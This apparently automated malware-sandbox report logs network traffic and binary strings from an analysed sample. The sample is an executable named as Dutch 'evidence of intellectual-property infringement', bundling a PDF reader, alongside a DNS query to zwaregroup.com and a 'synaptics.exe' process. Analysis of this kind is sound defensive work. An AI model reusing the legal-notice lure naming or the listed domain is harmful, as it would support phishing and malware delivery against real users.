Source: global traffic	HTTP traffic detected: GET /af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /af/40207f/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"Origin: https://auth.services.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://auth.services.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /p.gif?s=1&k=ecr2zvs&ht=tk&h=auth.services.adobe.com&f=7180.7182.7184&a=1164490&js=1.21.0&app=typekit&e=js&_=1737546003975 HTTP/1.1Host: p.typekit.netConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2Fngl_acrobat_reader1%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26hashed_device_id%3DllTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4%26device_name%3D226533%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dfalse&client_id=ngl_acrobat_reader1&scope=additional_info.account_type%2Copenid%2CAdobeID&relay=caedd4c3-514f-41c6-a924-eba11d7449b6&locale=en_US&flow_type=device&dctx_id=v%3A2%2Cs%2C811d9b10-f7f6-11ed-9fbc-3100c13f41be&idp_flow_type=login&s_p=google%2Cfacebook%2Capple%2Cmicrosoft%2Cline%2Ckakao&response_type=device&device_name=226533&hashed_device_id=llTAPL-75KPmSe-yahsrV5m7ieZTdxHJzalP2yrhpT4&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=falseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

DNS traffic detected: DNS query: zwaregroup.com

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://HDMHDMLoading...%s
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://blog.kowalczyk.infoKrzysztof
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14403939623.000028B200C04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14403480588.000028B201C04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14444143682.0000466002204000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14403556288.0000466000E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://css3pie.com
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://itexmac.sourceforge.net/SyncTeX.htmlJ
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14403480588.000028B201C04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14433319615.000028B2023BC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14444143682.0000466002204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jquery.com/
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14403480588.000028B201C04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14450128164.000028B201204000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14433319615.000028B2023BC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14444143682.0000466002204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jquery.org/license
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14453739598.000028B202890000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14447120741.00004660026C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://lists.w3.org/Archives/Public/public-svg-wg/2008JulSep/0347.html
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://mupdf.comMuPDFpdf
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://p.yusukekamiyamane.com/Yusuke
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14403480588.000028B201C04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14450128164.000028B201204000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14433319615.000028B2023BC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14444143682.0000466002204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sizzlejs.com/
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://william.famille-blum.org/William
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AF5B000.00000004.00000020.00020000.00000000.sdmp, Images.exe, 0000003D.00000003.14463912582.000001CC0ABBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.flashvidz.tk/Zenonprogram
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.freetype.org/FreeTypefont
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.haihaisoft.comSumatraPDF
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5
Source: synaptics.exe, 00000046.00000003.14798534354.00000000019D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllbad
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp, Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.zeniko.ch/#SumatraPDFSimon
Source: AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14823116939.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.V;6
Source: AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.
Source: AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/s
Source: AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entite=
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.jso
Source: AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.jso7P
Source: AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.jsoOPW
Source: AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
Source: AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/swW
Source: AdobeCollabSync.exe, 00000038.00000003.14229253069.000001993AACC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/BZQ
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/GY.
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/TZ#
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/cZ2
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/dX3
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/eY
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/j_9
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/qY
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/xY
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.adobe.io/sync/y_
Source: AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14823116939.000001993AAA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comments.y
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14453739598.000028B202890000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14447120741.00004660026C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/css-color-adjust-1/#forced-colors-properties
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14425423138.000028B20199C000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420091808.0000466000F9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_cloH
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14425639600.000028B2018F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_conerror_hup
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14425423138.000028B20199C000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420091808.0000466000F9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_conerror_tw
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14425423138.000028B20199C000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420091808.0000466000F9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_errcn(
Source: adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14421551088.0000466000F04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420506115.0000466000EF4000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425539175.0000466000F24000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425306255.0000466000F1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_loc
Source: adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14421551088.0000466000F04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420506115.0000466000EF4000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425539175.0000466000F24000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425306255.0000466000F1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_prolh
Source: adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14421551088.0000466000F04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420506115.0000466000EF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_stoor_jp
